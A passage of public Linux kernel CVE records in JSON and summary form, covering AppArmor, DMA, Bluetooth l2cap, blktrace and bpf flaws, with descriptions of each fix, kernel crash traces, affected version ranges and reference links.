"value": "In the Linux kernel, the following vulnerability has been resolved:\n\napparmor: Fix null pointer deref when receiving skb during sock creation\n\nThe panic below is observed when receiving ICMP packets with secmark set\nwhile an ICMP raw socket is being created. SK_CTX(sk)-\u003elabel is updated\nin apparmor_socket_post_create(), but the packet is delivered to the\nsocket before that, causing the null pointer dereference.\nDrop the packet if label context is not set.\n\n BUG: kernel NULL pointer dereference, address: 000000000000004c\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 0 P4D 0\n Oops: 0000 [#1] PREEMPT SMP NOPTI\n CPU: 0 PID: 407 Comm: a.out Not tainted 6.4.12-arch1-1 #1 3e6fa2753a2d75925c34ecb78e22e85a65d083df\n Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 05/28/2020\n RIP: 0010:aa_label_next_confined+0xb/0x40\n Code: 00 00 48 89 ef e8 d5 25 0c 00 e9 66 ff ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 66 0f 1f 00 0f 1f 44 00 00 89 f0 \u003c8b\u003e 77 4c 39 c6 7e 1f 48 63 d0 48 8d 14 d7 eb 0b 83 c0 01 48 83 c2\n RSP: 0018:ffffa92940003b08 EFLAGS: 00010246\n RAX: 0000000000000000 RBX: 0000000000000000 RCX: 000000000000000e\n RDX: ffffa92940003be8 RSI: 0000000000000000 RDI: 0000000000000000\n RBP: ffff8b57471e7800 R08: ffff8b574c642400 R09: 0000000000000002\n R10: ffffffffbd820eeb R11: ffffffffbeb7ff00 R12: ffff8b574c642400\n R13: 0000000000000001 R14: 0000000000000001 R15: 0000000000000000\n FS: 00007fb092ea7640(0000) GS:ffff8b577bc00000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 000000000000004c CR3: 00000001020f2005 CR4: 00000000007706f0\n PKRU: 55555554\n Call Trace:\n \u003cIRQ\u003e\n ? __die+0x23/0x70\n ? page_fault_oops+0x171/0x4e0\n ? exc_page_fault+0x7f/0x180\n ? asm_exc_page_fault+0x26/0x30\n ? aa_label_next_confined+0xb/0x40\n apparmor_secmark_check+0xec/0x330\n security_sock_rcv_skb+0x35/0x50\n sk_filter_trim_cap+0x47/0x250\n sock_queue_rcv_skb_reason+0x20/0x60\n raw_rcv+0x13c/0x210\n raw_local_deliver+0x1f3/0x250\n ip_protocol_deliver_rcu+0x4f/0x2f0\n ip_local_deliver_finish+0x76/0xa0\n __netif_receive_skb_one_core+0x89/0xa0\n netif_receive_skb+0x119/0x170\n ? __netdev_alloc_skb+0x3d/0x140\n vmxnet3_rq_rx_complete+0xb23/0x1010 [vmxnet3 56a84f9c97178c57a43a24ec073b45a9d6f01f3a]\n vmxnet3_poll_rx_only+0x36/0xb0 [vmxnet3 56a84f9c97178c57a43a24ec073b45a9d6f01f3a]\n __napi_poll+0x28/0x1b0\n net_rx_action+0x2a4/0x380\n __do_softirq+0xd1/0x2c8\n __irq_exit_rcu+0xbb/0xf0\n common_interrupt+0x86/0xa0\n \u003c/IRQ\u003e\n \u003cTASK\u003e\n asm_common_interrupt+0x26/0x40\n RIP: 0010:apparmor_socket_post_create+0xb/0x200\n Code: 08 48 85 ff 75 a1 eb b1 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 0f 1f 44 00 00 41 54 \u003c55\u003e 48 89 fd 53 45 85 c0 0f 84 b2 00 00 00 48 8b 1d 80 56 3f 02 48\n RSP: 0018:ffffa92940ce7e50 EFLAGS: 00000286\n RAX: ffffffffbc756440 RBX: 0000000000000000 RCX: 0000000000000001\n RDX: 0000000000000003 RSI: 0000000000000002 RDI: ffff8b574eaab740\n RBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000\n R10: ffff8b57444cec70 R11: 0000000000000000 R12: 0000000000000003\n R13: 0000000000000002 R14: ffff8b574eaab740 R15: ffffffffbd8e4748\n ? __pfx_apparmor_socket_post_create+0x10/0x10\n security_socket_post_create+0x4b/0x80\n __sock_create+0x176/0x1f0\n __sys_socket+0x89/0x100\n __x64_sys_socket+0x17/0x20\n do_syscall_64+0x5d/0x90\n ? do_syscall_64+0x6c/0x90\n ? do_syscall_64+0x6c/0x90\n ? do_syscall_64+0x6c/0x90\n entry_SYSCALL_64_after_hwframe+0x72/0xdc"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:45:24.777Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/0abe35bc48d4ec80424b1f4b3560c0e082cbd5c1"
},
{
"url": "https://git.kernel.org/stable/c/347dcb84a4874b5fb375092c08d8cc4069b94f81"
},
{
"url": "https://git.kernel.org/stable/c/290a6b88e8c19b6636ed1acc733d1458206f7697"
},
{
"url": "https://git.kernel.org/stable/c/ead2ad1d9f045f26fdce3ef1644913b3a6cd38f2"
},
{
"url": "https://git.kernel.org/stable/c/6c920754f62cefc63fccdc38a062c7c3452e2961"
},
{
"url": "https://git.kernel.org/stable/c/46c17ead5b7389e22e7dc9903fd0ba865d05bda2"
},
{
"url": "https://git.kernel.org/stable/c/fce09ea314505a52f2436397608fa0a5d0934fb1"
}
],
"title": "apparmor: Fix null pointer deref when receiving skb during sock creation",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52889",
"datePublished": "2024-08-17T09:08:43.973Z",
"dateReserved": "2024-05-21T15:35:00.782Z",
"dateUpdated": "2025-05-04T07:45:24.777Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-0854 (GCVE-0-2022-0854)
Vulnerability from cvelistv5
Published
2022-03-23 19:46
Modified
2024-08-02 23:40
Severity ?
VLAI Severity ?
EPSS score ?
CWE
Summary
A memory leak flaw was found in the Linux kernel’s DMA subsystem, in the way a user calls DMA_FROM_DEVICE. This flaw allows a local user to read random memory from the kernel space.
References
| URL | Tags | |||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:40:04.528Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/kernel/dma/swiotlb.c?h=v5.17-rc8\u0026id=aa6f8dcbab473f3a3c7454b74caa46d36cdc5d13"
},
{
"name": "DSA-5161",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5161"
},
{
"name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html"
},
{
"name": "DSA-5173",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN",
"x_transferred"
],
"url": "https://www.debian.org/security/2022/dsa-5173"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Kernel",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "Linux kernel 5.17-rc8"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A memory leak flaw was found in the Linux kernel\u2019s DMA subsystem, in the way a user calls DMA_FROM_DEVICE. This flaw allows a local user to read random memory from the kernel space."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-200",
"description": "CWE-200",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-07-04T10:11:26",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/kernel/dma/swiotlb.c?h=v5.17-rc8\u0026id=aa6f8dcbab473f3a3c7454b74caa46d36cdc5d13"
},
{
"name": "DSA-5161",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "https://www.debian.org/security/2022/dsa-5161"
},
{
"name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html"
},
{
"name": "DSA-5173",
"tags": [
"vendor-advisory",
"x_refsource_DEBIAN"
],
"url": "https://www.debian.org/security/2022/dsa-5173"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "secalert@redhat.com",
"ID": "CVE-2022-0854",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Kernel",
"version": {
"version_data": [
{
"version_value": "Linux kernel 5.17-rc8"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A memory leak flaw was found in the Linux kernel\u2019s DMA subsystem, in the way a user calls DMA_FROM_DEVICE. This flaw allows a local user to read random memory from the kernel space."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-200"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/kernel/dma/swiotlb.c?h=v5.17-rc8\u0026id=aa6f8dcbab473f3a3c7454b74caa46d36cdc5d13",
"refsource": "MISC",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/kernel/dma/swiotlb.c?h=v5.17-rc8\u0026id=aa6f8dcbab473f3a3c7454b74caa46d36cdc5d13"
},
{
"name": "DSA-5161",
"refsource": "DEBIAN",
"url": "https://www.debian.org/security/2022/dsa-5161"
},
{
"name": "[debian-lts-announce] 20220701 [SECURITY] [DLA 3065-1] linux security update",
"refsource": "MLIST",
"url": "https://lists.debian.org/debian-lts-announce/2022/07/msg00000.html"
},
{
"name": "DSA-5173",
"refsource": "DEBIAN",
"url": "https://www.debian.org/security/2022/dsa-5173"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2022-0854",
"datePublished": "2022-03-23T19:46:15",
"dateReserved": "2022-03-04T00:00:00",
"dateUpdated": "2024-08-02T23:40:04.528Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-41062 (GCVE-0-2024-41062)
Vulnerability from cvelistv5
Published
2024-07-29 14:57
Modified
2025-05-04 09:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bluetooth/l2cap: sync sock recv cb and release
The problem occurs between the system call to close the sock and hci_rx_work,
where the former releases the sock and the latter accesses it without lock protection.
CPU0 CPU1
---- ----
sock_close hci_rx_work
l2cap_sock_release hci_acldata_packet
l2cap_sock_kill l2cap_recv_frame
sk_free l2cap_conless_channel
l2cap_sock_recv_cb
If hci_rx_work processes the data that needs to be received before the sock is
closed, then everything is normal; Otherwise, the work thread may access the
released sock when receiving data.
Add a chan mutex in the rx callback of the sock to achieve synchronization between
the sock release and recv cb.
Sock is dead, so set chan data to NULL, avoid others use invalid sock pointer.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:46:52.343Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/605572e64cd9cebb05ed609d96cff05b50d18cdf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b803f30ea23e0968b6c8285c42adf0d862ab2bf6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3b732449b78183d17178db40be3a4401cf3cd629"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/89e856e124f9ae548572c56b1b70c2255705f8fe"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41062",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:22:05.690775Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:32:59.338Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/bluetooth/l2cap_sock.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "605572e64cd9cebb05ed609d96cff05b50d18cdf",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b803f30ea23e0968b6c8285c42adf0d862ab2bf6",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3b732449b78183d17178db40be3a4401cf3cd629",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "89e856e124f9ae548572c56b1b70c2255705f8fe",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/bluetooth/l2cap_sock.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.101",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.42",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.101",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.42",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbluetooth/l2cap: sync sock recv cb and release\n\nThe problem occurs between the system call to close the sock and hci_rx_work,\nwhere the former releases the sock and the latter accesses it without lock protection.\n\n CPU0 CPU1\n ---- ----\n sock_close hci_rx_work\n\t l2cap_sock_release hci_acldata_packet\n\t l2cap_sock_kill l2cap_recv_frame\n\t sk_free l2cap_conless_channel\n\t l2cap_sock_recv_cb\n\nIf hci_rx_work processes the data that needs to be received before the sock is\nclosed, then everything is normal; Otherwise, the work thread may access the\nreleased sock when receiving data.\n\nAdd a chan mutex in the rx callback of the sock to achieve synchronization between\nthe sock release and recv cb.\n\nSock is dead, so set chan data to NULL, avoid others use invalid sock pointer."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:21:14.428Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/605572e64cd9cebb05ed609d96cff05b50d18cdf"
},
{
"url": "https://git.kernel.org/stable/c/b803f30ea23e0968b6c8285c42adf0d862ab2bf6"
},
{
"url": "https://git.kernel.org/stable/c/3b732449b78183d17178db40be3a4401cf3cd629"
},
{
"url": "https://git.kernel.org/stable/c/89e856e124f9ae548572c56b1b70c2255705f8fe"
}
],
"title": "bluetooth/l2cap: sync sock recv cb and release",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41062",
"datePublished": "2024-07-29T14:57:24.352Z",
"dateReserved": "2024-07-12T12:17:45.627Z",
"dateUpdated": "2025-05-04T09:21:14.428Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48913 (GCVE-0-2022-48913)
Vulnerability from cvelistv5
Published
2024-08-22 01:31
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
blktrace: fix use after free for struct blk_trace
When tracing the whole disk, 'dropped' and 'msg' will be created
under 'q->debugfs_dir' and 'bt->dir' is NULL, thus blk_trace_free()
won't remove those files. What's worse, the following UAF can be
triggered because of accessing stale 'dropped' and 'msg':
==================================================================
BUG: KASAN: use-after-free in blk_dropped_read+0x89/0x100
Read of size 4 at addr ffff88816912f3d8 by task blktrace/1188
CPU: 27 PID: 1188 Comm: blktrace Not tainted 5.17.0-rc4-next-20220217+ #469
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ?-20190727_073836-4
Call Trace:
<TASK>
dump_stack_lvl+0x34/0x44
print_address_description.constprop.0.cold+0xab/0x381
? blk_dropped_read+0x89/0x100
? blk_dropped_read+0x89/0x100
kasan_report.cold+0x83/0xdf
? blk_dropped_read+0x89/0x100
kasan_check_range+0x140/0x1b0
blk_dropped_read+0x89/0x100
? blk_create_buf_file_callback+0x20/0x20
? kmem_cache_free+0xa1/0x500
? do_sys_openat2+0x258/0x460
full_proxy_read+0x8f/0xc0
vfs_read+0xc6/0x260
ksys_read+0xb9/0x150
? vfs_write+0x3d0/0x3d0
? fpregs_assert_state_consistent+0x55/0x60
? exit_to_user_mode_prepare+0x39/0x1e0
do_syscall_64+0x35/0x80
entry_SYSCALL_64_after_hwframe+0x44/0xae
RIP: 0033:0x7fbc080d92fd
Code: ce 20 00 00 75 10 b8 00 00 00 00 0f 05 48 3d 01 f0 ff ff 73 31 c3 48 83 1
RSP: 002b:00007fbb95ff9cb0 EFLAGS: 00000293 ORIG_RAX: 0000000000000000
RAX: ffffffffffffffda RBX: 00007fbb95ff9dc0 RCX: 00007fbc080d92fd
RDX: 0000000000000100 RSI: 00007fbb95ff9cc0 RDI: 0000000000000045
RBP: 0000000000000045 R08: 0000000000406299 R09: 00000000fffffffd
R10: 000000000153afa0 R11: 0000000000000293 R12: 00007fbb780008c0
R13: 00007fbb78000938 R14: 0000000000608b30 R15: 00007fbb780029c8
</TASK>
Allocated by task 1050:
kasan_save_stack+0x1e/0x40
__kasan_kmalloc+0x81/0xa0
do_blk_trace_setup+0xcb/0x410
__blk_trace_setup+0xac/0x130
blk_trace_ioctl+0xe9/0x1c0
blkdev_ioctl+0xf1/0x390
__x64_sys_ioctl+0xa5/0xe0
do_syscall_64+0x35/0x80
entry_SYSCALL_64_after_hwframe+0x44/0xae
Freed by task 1050:
kasan_save_stack+0x1e/0x40
kasan_set_track+0x21/0x30
kasan_set_free_info+0x20/0x30
__kasan_slab_free+0x103/0x180
kfree+0x9a/0x4c0
__blk_trace_remove+0x53/0x70
blk_trace_ioctl+0x199/0x1c0
blkdev_common_ioctl+0x5e9/0xb30
blkdev_ioctl+0x1a5/0x390
__x64_sys_ioctl+0xa5/0xe0
do_syscall_64+0x35/0x80
entry_SYSCALL_64_after_hwframe+0x44/0xae
The buggy address belongs to the object at ffff88816912f380
which belongs to the cache kmalloc-96 of size 96
The buggy address is located 88 bytes inside of
96-byte region [ffff88816912f380, ffff88816912f3e0)
The buggy address belongs to the page:
page:000000009a1b4e7c refcount:1 mapcount:0 mapping:0000000000000000 index:0x0f
flags: 0x17ffffc0000200(slab|node=0|zone=2|lastcpupid=0x1fffff)
raw: 0017ffffc0000200 ffffea00044f1100 dead000000000002 ffff88810004c780
raw: 0000000000000000 0000000000200020 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected
Memory state around the buggy address:
ffff88816912f280: fa fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc
ffff88816912f300: fa fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc
>ffff88816912f380: fa fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc
^
ffff88816912f400: fa fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc
ffff88816912f480: fa fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc
==================================================================
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48913",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:33:53.963718Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:11.780Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/trace/blktrace.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "78acc7dbd84a8c173a08584750845c31611160f2",
"status": "affected",
"version": "c0ea57608b691d6cde8aff23e11f9858a86b5918",
"versionType": "git"
},
{
"lessThan": "6418634238ade86f2b08192928787f39d8afb58c",
"status": "affected",
"version": "c0ea57608b691d6cde8aff23e11f9858a86b5918",
"versionType": "git"
},
{
"lessThan": "30939293262eb433c960c4532a0d59c4073b2b84",
"status": "affected",
"version": "c0ea57608b691d6cde8aff23e11f9858a86b5918",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"kernel/trace/blktrace.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.12"
},
{
"lessThan": "5.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.27",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.13",
"versionStartIncluding": "5.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nblktrace: fix use after free for struct blk_trace\n\nWhen tracing the whole disk, \u0027dropped\u0027 and \u0027msg\u0027 will be created\nunder \u0027q-\u003edebugfs_dir\u0027 and \u0027bt-\u003edir\u0027 is NULL, thus blk_trace_free()\nwon\u0027t remove those files. What\u0027s worse, the following UAF can be\ntriggered because of accessing stale \u0027dropped\u0027 and \u0027msg\u0027:\n\n==================================================================\nBUG: KASAN: use-after-free in blk_dropped_read+0x89/0x100\nRead of size 4 at addr ffff88816912f3d8 by task blktrace/1188\n\nCPU: 27 PID: 1188 Comm: blktrace Not tainted 5.17.0-rc4-next-20220217+ #469\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ?-20190727_073836-4\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x34/0x44\n print_address_description.constprop.0.cold+0xab/0x381\n ? blk_dropped_read+0x89/0x100\n ? blk_dropped_read+0x89/0x100\n kasan_report.cold+0x83/0xdf\n ? blk_dropped_read+0x89/0x100\n kasan_check_range+0x140/0x1b0\n blk_dropped_read+0x89/0x100\n ? blk_create_buf_file_callback+0x20/0x20\n ? kmem_cache_free+0xa1/0x500\n ? do_sys_openat2+0x258/0x460\n full_proxy_read+0x8f/0xc0\n vfs_read+0xc6/0x260\n ksys_read+0xb9/0x150\n ? vfs_write+0x3d0/0x3d0\n ? fpregs_assert_state_consistent+0x55/0x60\n ? exit_to_user_mode_prepare+0x39/0x1e0\n do_syscall_64+0x35/0x80\n entry_SYSCALL_64_after_hwframe+0x44/0xae\nRIP: 0033:0x7fbc080d92fd\nCode: ce 20 00 00 75 10 b8 00 00 00 00 0f 05 48 3d 01 f0 ff ff 73 31 c3 48 83 1\nRSP: 002b:00007fbb95ff9cb0 EFLAGS: 00000293 ORIG_RAX: 0000000000000000\nRAX: ffffffffffffffda RBX: 00007fbb95ff9dc0 RCX: 00007fbc080d92fd\nRDX: 0000000000000100 RSI: 00007fbb95ff9cc0 RDI: 0000000000000045\nRBP: 0000000000000045 R08: 0000000000406299 R09: 00000000fffffffd\nR10: 000000000153afa0 R11: 0000000000000293 R12: 00007fbb780008c0\nR13: 00007fbb78000938 R14: 0000000000608b30 R15: 00007fbb780029c8\n \u003c/TASK\u003e\n\nAllocated by task 1050:\n kasan_save_stack+0x1e/0x40\n __kasan_kmalloc+0x81/0xa0\n do_blk_trace_setup+0xcb/0x410\n __blk_trace_setup+0xac/0x130\n blk_trace_ioctl+0xe9/0x1c0\n blkdev_ioctl+0xf1/0x390\n __x64_sys_ioctl+0xa5/0xe0\n do_syscall_64+0x35/0x80\n entry_SYSCALL_64_after_hwframe+0x44/0xae\n\nFreed by task 1050:\n kasan_save_stack+0x1e/0x40\n kasan_set_track+0x21/0x30\n kasan_set_free_info+0x20/0x30\n __kasan_slab_free+0x103/0x180\n kfree+0x9a/0x4c0\n __blk_trace_remove+0x53/0x70\n blk_trace_ioctl+0x199/0x1c0\n blkdev_common_ioctl+0x5e9/0xb30\n blkdev_ioctl+0x1a5/0x390\n __x64_sys_ioctl+0xa5/0xe0\n do_syscall_64+0x35/0x80\n entry_SYSCALL_64_after_hwframe+0x44/0xae\n\nThe buggy address belongs to the object at ffff88816912f380\n which belongs to the cache kmalloc-96 of size 96\nThe buggy address is located 88 bytes inside of\n 96-byte region [ffff88816912f380, ffff88816912f3e0)\nThe buggy address belongs to the page:\npage:000000009a1b4e7c refcount:1 mapcount:0 mapping:0000000000000000 index:0x0f\nflags: 0x17ffffc0000200(slab|node=0|zone=2|lastcpupid=0x1fffff)\nraw: 0017ffffc0000200 ffffea00044f1100 dead000000000002 ffff88810004c780\nraw: 0000000000000000 0000000000200020 00000001ffffffff 0000000000000000\npage dumped because: kasan: bad access detected\n\nMemory state around the buggy address:\n ffff88816912f280: fa fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc\n ffff88816912f300: fa fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc\n\u003effff88816912f380: fa fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc\n ^\n ffff88816912f400: fa fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc\n ffff88816912f480: fa fb fb fb fb fb fb fb fb fb fb fb fc fc fc fc\n=================================================================="
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:59.343Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/78acc7dbd84a8c173a08584750845c31611160f2"
},
{
"url": "https://git.kernel.org/stable/c/6418634238ade86f2b08192928787f39d8afb58c"
},
{
"url": "https://git.kernel.org/stable/c/30939293262eb433c960c4532a0d59c4073b2b84"
}
],
"title": "blktrace: fix use after free for struct blk_trace",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48913",
"datePublished": "2024-08-22T01:31:34.860Z",
"dateReserved": "2024-08-21T06:06:23.294Z",
"dateUpdated": "2025-05-04T08:25:59.343Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48939 (GCVE-0-2022-48939)
Vulnerability from cvelistv5
Published
2024-08-22 03:31
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bpf: Add schedule points in batch ops
syzbot reported various soft lockups caused by bpf batch operations.
INFO: task kworker/1:1:27 blocked for more than 140 seconds.
INFO: task hung in rcu_barrier
Nothing prevents batch ops to process huge amount of data,
we need to add schedule points in them.
